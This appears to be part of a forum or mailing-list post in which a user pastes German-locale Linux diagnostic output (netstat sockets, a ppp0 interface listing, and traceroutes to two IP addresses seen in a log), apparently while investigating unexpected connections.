/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2049
unix 3 [ ] STREAM VERBUNDEN 2036
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2035
unix 3 [ ] STREAM VERBUNDEN 2030
unix 3 [ ] STREAM VERBUNDEN 2029
unix 3 [ ] STREAM VERBUNDEN 1965 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1964
unix 3 [ ] STREAM VERBUNDEN 1945 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1944
unix 3 [ ] STREAM VERBUNDEN 1773 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1772
unix 3 [ ] STREAM VERBUNDEN 1749
/tmp/.font-unix/fs7110
unix 3 [ ] STREAM VERBUNDEN 1748
unix 3 [ ] STREAM VERBUNDEN 1751 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1745
unix 2 [ ] DGRAM 408
unix 2 [ ] DGRAM 210
======== one more traceroute 30 min later
ppp0 Protokoll:Punkt-zu-Punkt Verbindung
inet Adresse:213.218.5.200 P-z-P:195.2.163.147
Maske:255.255.255.255
UP PUNKTZUPUNKT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:4 errors:2 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:3
RX bytes:192 (192.0 b) TX bytes:138 (138.0 b)
======= traceroute 213.157.182.3 (the address first appearing in the log):
1 pm3-fr2.toplink-plannet.de (195.2.163.147) 124.134 ms 119.642 ms
129.957 ms
2 a391c.fe0-0-2.frances.fre1.toplink-plan.net (195.2.163.145) 109.935 ms
129.849 ms 119.954 ms
3 bca1e.ser6-0.susan.stu1.toplink-plan.net (195.2.188.161) 129.967 ms
129.879 ms 119.952 ms
4 c032e.ser6-0.kay.kar1.toplink-plan.net (212.126.192.50) 129.965 ms
139.856 ms 119.952 ms
5 c893c.bbo1.elena.kar1.toplink-plan.net (212.126.200.147) 119.978 ms
139.876 ms 119.952 ms
6 1e11c.bbo4.franca.fra3.toplink-plan.net (213.218.30.17) 129.980 ms
149.866 ms 139.961 ms
7 fra2-br1-fe0-0.rdsnet.ro (80.81.192.87) 129.967 ms 119.881 ms 129.958
ms
8 fra2-cr1-atm2-210.rdsnet.ro (62.231.127.65) 139.961 ms 119.877 ms
119.958 ms
9 buh1-gsr1-p6-0.rdsnet.ro (193.231.252.233) 149.966 ms 149.852 ms
149.959 ms
10 buh1-htb-ge0.rdsnet.ro (62.231.74.30) 159.975 ms 159.870 ms 179.971 ms
11 buh1-cr1-vlan4.rdsnet.ro (193.231.252.73) 169.940 ms 149.873 ms 149.957
ms
12 buh1-gw3-fe0-0.rdsnet.ro (193.231.184.154) 159.961 ms 159.863 ms
169.959 ms
13 213.157.182.3 (213.157.182.3) 179.973 ms 199.847 ms 219.961 ms
======= traceroute 213.37.21.54 (the 'main' accessing address):
1 pm3-fr2.toplink-plannet.de (195.2.163.147) 131.377 ms 109.652 ms
120.023 ms
2 a391c.fe0-0-2.frances.fre1.toplink-plan.net (195.2.163.145) 119.864 ms
109.876 ms 119.956 ms
3 bca1e.ser6-0.susan.stu1.toplink-plan.net (195.2.188.161) 119.958 ms
109.864 ms 119.957 ms
4 c032e.ser6-0.kay.kar1.toplink-plan.net (212.126.192.50) 119.953 ms
109.875 ms 129.923 ms
5 c892c.bbo1.carmen.kar1.toplink-plan.net (212.126.200.146) 129.965 ms
119.849 ms 119.964 ms
6 1e11c.bbo4.franca.fra3.toplink-plan.net (213.218.30.17) 129.961 ms
129.876 ms 149.931 ms
7 24e9d.1.level3.ups.fra3.toplink-plan.net (62.67.36.233) 139.982 ms
139.809 ms 139.955 ms
8 ae0-55.mp1.Frankfurt1.Level3.net (195.122.136.97) 129.966 ms 129.876 ms
139.969 ms
9 so-0-0-0.mp1.London2.Level3.net (212.187.128.61) 139.950 ms 149.791 ms
149.951 ms
10 so-1-0-0.bbr1.Washington1.level3.net (212.187.128.138) 219.979 ms
229.937 ms 209.878 ms
11 so-6-0-0.edge1.Washington1.Level3.net (209.244.11.10) 219.930 ms 229.847
ms 209.928 ms
12 65.59.88.210 (65.59.88.210) 219.934 ms 209.635 ms 209.977 ms
13 if-6-0.core1.Ashburn.Teleglobe.net (207.45.223.113) 209.906 ms 209.821
ms 209.926 ms
14 if-2-0.core2.Newark.Teleglobe.net (64.86.83.213) 219.931 ms 219.844 ms
239.882 ms
15 if-8-0.core2.London2.Teleglobe.net (66.110.8.142) 310.012 ms 309.913 ms
299.833 ms
16 if-5-0.core1.London2.teleglobe.net (195.219.15.217) 310.001 ms 289.802
ms 299.970 ms
17 if-5-0.core1.Madrid.Teleglobe.net (195.219.133.61) 329.906 ms 329.867 ms
329.963 ms
18 if-6-0.core2.Madrid.Teleglobe.net (195.219.149.77) 339.945 ms 329.857 ms
330.040 ms
19 * * *
20 10.127.1.26 (10.127.1.26) 330.038 ms 319.823 ms 329.904 ms
21 62.100.101.6 (62.100.101.6) 329.987 ms 319.843 ms 329.973 ms
22 10.21.2.100 (10.21.2.100) 329.962 ms 319.890 ms 339.985 ms
23 10.42.211.2 (10.42.211.2) 329.941 ms 329.896 ms 329.989 ms
24 * * * (before here was 213.37.21.54)
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * * (ping doesn't reah it either)
Reply to: